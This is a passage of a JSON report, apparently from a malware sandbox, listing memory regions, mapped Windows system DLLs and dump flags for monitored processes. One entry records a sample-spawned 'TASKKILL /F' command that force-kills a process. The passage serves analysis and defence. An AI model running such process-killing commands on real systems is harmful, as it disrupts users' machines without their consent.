4587520, "timestamp": "00:01:30.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 9109503, "entry_point": 0, "filename": null, "id": "region_3826", "name": "private_0x0000000000870000", "norm_filename": null, "region_type": "private_memory", "start_va": 8847360, "timestamp": "00:01:30.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33226752, "type": "region", "version": 1 }, "end_va": 33488895, "entry_point": 0, "filename": null, "id": "region_3827", "name": "private_0x0000000001fb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33226752, "timestamp": "00:01:30.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33488896, "type": "region", "version": 1 }, "end_va": 33751039, "entry_point": 0, "filename": null, "id": "region_3828", "name": "private_0x0000000001ff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33488896, "timestamp": "00:01:30.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1786707968, "type": "region", "version": 1 }, "end_va": 1786769407, "entry_point": 1786716576, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_3829", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1786707968, "timestamp": "00:01:30.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3830", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:30.529", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3831", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:30.529", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1783103488, "type": "region", "version": 1 }, "end_va": 1783717887, "entry_point": 1783232697, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_3832", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1783103488, "timestamp": "00:01:30.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1786576896, "type": "region", "version": 1 }, "end_va": 1786675199, "entry_point": 1786581813, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_3833", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1786576896, "timestamp": "00:01:30.537", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM PresentationFontCache.exe /IM PresentationFontCache.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_31", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 31, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3834", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:30.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3835", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:30.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3836", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:30.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_3837", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:30.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_3838", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:30.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_3839", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:30.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_3840", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:01:30.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 8912896, "type": "region", "version": 1 }, "end_va": 9003007, "entry_point": 8936585, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_3841", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 8912896, "timestamp": "00:01:30.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3842", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:30.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3843", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:30.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3844", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:30.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3845", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:30.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3846", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:30.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3847", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:30.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3848", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:30.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3849", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:30.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3850", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:30.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_3851", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:01:30.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3852", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:30.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3853", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:30.790", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3854", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:30.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_3855", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:30.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_3856", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:30.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3857", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:30.813", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3858", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:30.813", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1535999, "entry_point": 1114112, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3859", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1114112, "timestamp": "00:01:30.813", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_3860", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:30.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 7274495, "entry_point": 0, "filename": null, "id": "region_3861", "name": "private_0x00000000005f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6225920, "timestamp": "00:01:30.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786445824, "type": "region", "version": 1 }, "end_va": 1787408383, "entry_point": 1786450894, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_3862", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786445824, "timestamp": "00:01:30.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787490303, "entry_point": 1787433633, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_3863", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:30.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787494400, "type": "region", "version": 1 }, "end_va": 1787564031, "entry_point": 1787499264, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_3864", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787494400, "timestamp": "00:01:30.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1787625472, "type": "region", "version": 1 }, "end_va": 1787678719, "entry_point": 1787630048, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_3865", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787625472, "timestamp": "00:01:30.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787908095, "entry_point": 1787696085, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_3866", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:30.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_3867", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:30.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944293375, "entry_point": 1944262054, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_3868", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:30.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3869", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:30.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_3870", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:30.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_3871", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:30.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3872", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:30.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3873", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:30.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3874", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:30.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3875", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:30.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3876", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:30.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3877", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:30.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3878", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:30.823", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3879", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:30.823", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3880", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:30.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3881", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:30.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3882", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:30.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3883", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:30.825", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3884", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:30.825", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, 